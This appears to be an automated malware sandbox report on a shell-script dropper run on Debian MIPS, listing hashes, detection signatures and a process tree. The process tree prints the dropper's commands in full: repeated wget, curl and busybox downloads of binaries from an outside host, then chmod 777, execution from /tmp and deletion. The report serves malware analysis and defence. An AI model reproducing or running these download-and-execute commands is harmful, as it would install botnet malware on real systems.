Analysis
-
max time kernel
90s -
max time network
119s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
28/10/2024, 02:20
Static task
static1
Behavioral task
behavioral1
Sample
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
-
Size
10KB
-
MD5
a5dec9cd68c75301d742f7bf9789c4f8
-
SHA1
24ee3d00677e483eae3654f0eab7a2a06e912288
-
SHA256
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1
-
SHA512
0d552f2f17ef3eb821b94288c9fd717568161003de257fd488b93a41c02257759480e52b93d5d19fee1311a87d6b6136233520c17351af772d5b2ccc6311f9b4
-
SSDEEP
192:nXbslV5d8Mv+SUMyCP8okpm79NzTaBVpc8Mv+S2XbslV1yCP8okzvzTaBV2:nXbslV5d8Mv+SUMyCP8oom79Mc8Mv+SW
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh1⤵PID:708
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- System Network Configuration Discovery
PID:717
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- System Network Configuration Discovery
PID:741
-
-
/bin/chmodchmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:744
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- System Network Configuration Discovery
PID:745
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- System Network Configuration Discovery
PID:757
-
-
/bin/chmodchmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:769
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- System Network Configuration Discovery
PID:770
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- System Network Configuration Discovery
PID:788
-
-
/bin/chmodchmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Executes dropped EXE
PID:795
-
-
/bin/rmrm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:799
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- System Network Configuration Discovery
PID:800
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:816
-
-
/bin/chmodchmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:819
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:820
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- System Network Configuration Discovery
PID:823
-
-
/bin/chmodchmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:826
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- System Network Configuration Discovery
PID:827
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- System Network Configuration Discovery
PID:833
-
-
/bin/chmodchmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:840
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- System Network Configuration Discovery
PID:841
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- System Network Configuration Discovery
PID:852
-
-
/bin/chmodchmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:860
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- System Network Configuration Discovery
PID:877
-
-
/bin/chmodchmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:880
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- System Network Configuration Discovery
PID:881
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- System Network Configuration Discovery
PID:884
-
-
/bin/chmodchmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- System Network Configuration Discovery
PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:891
-
-
/bin/chmodchmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:895
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- System Network Configuration Discovery
PID:896
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:899
-
-
/bin/chmodchmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:902
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:903
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/chmodchmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:909
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- System Network Configuration Discovery
PID:910
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- System Network Configuration Discovery
PID:913
-
-
/bin/chmodchmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- System Network Configuration Discovery
PID:929
-
-
/bin/chmodchmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:932
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- System Network Configuration Discovery
PID:933
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:936
-
-
/bin/chmodchmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:939
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- System Network Configuration Discovery
PID:940
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- System Network Configuration Discovery
PID:943
-
-
/bin/chmodchmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:947
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- System Network Configuration Discovery
PID:948
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- System Network Configuration Discovery
PID:951
-
-
/bin/chmodchmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:954
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:955
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:958
-
-
/bin/chmodchmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:961
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- System Network Configuration Discovery
PID:962
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- System Network Configuration Discovery
PID:965
-
-
/bin/chmodchmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:968
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- System Network Configuration Discovery
PID:969
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- System Network Configuration Discovery
PID:972
-
-
/bin/chmodchmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:975
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- System Network Configuration Discovery
PID:976
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- System Network Configuration Discovery
PID:979
-
-
/bin/chmodchmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:982
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- System Network Configuration Discovery
PID:983
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:986
-
-
/bin/chmodchmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:989
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:990
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:991
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- System Network Configuration Discovery
PID:993
-
-
/bin/chmodchmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Executes dropped EXE
PID:995
-
-
/bin/rmrm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/chmodchmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:1005
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:1006
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1007
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- System Network Configuration Discovery
PID:1009
-
-
/bin/chmodchmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- File and Directory Permissions Modification
PID:1010
-
-
/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Executes dropped EXE
PID:1011
-
-
/bin/rmrm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:1012
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- System Network Configuration Discovery
PID:1013
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1014
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:1016
-
-
/bin/chmodchmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- File and Directory Permissions Modification
PID:1017
-
-
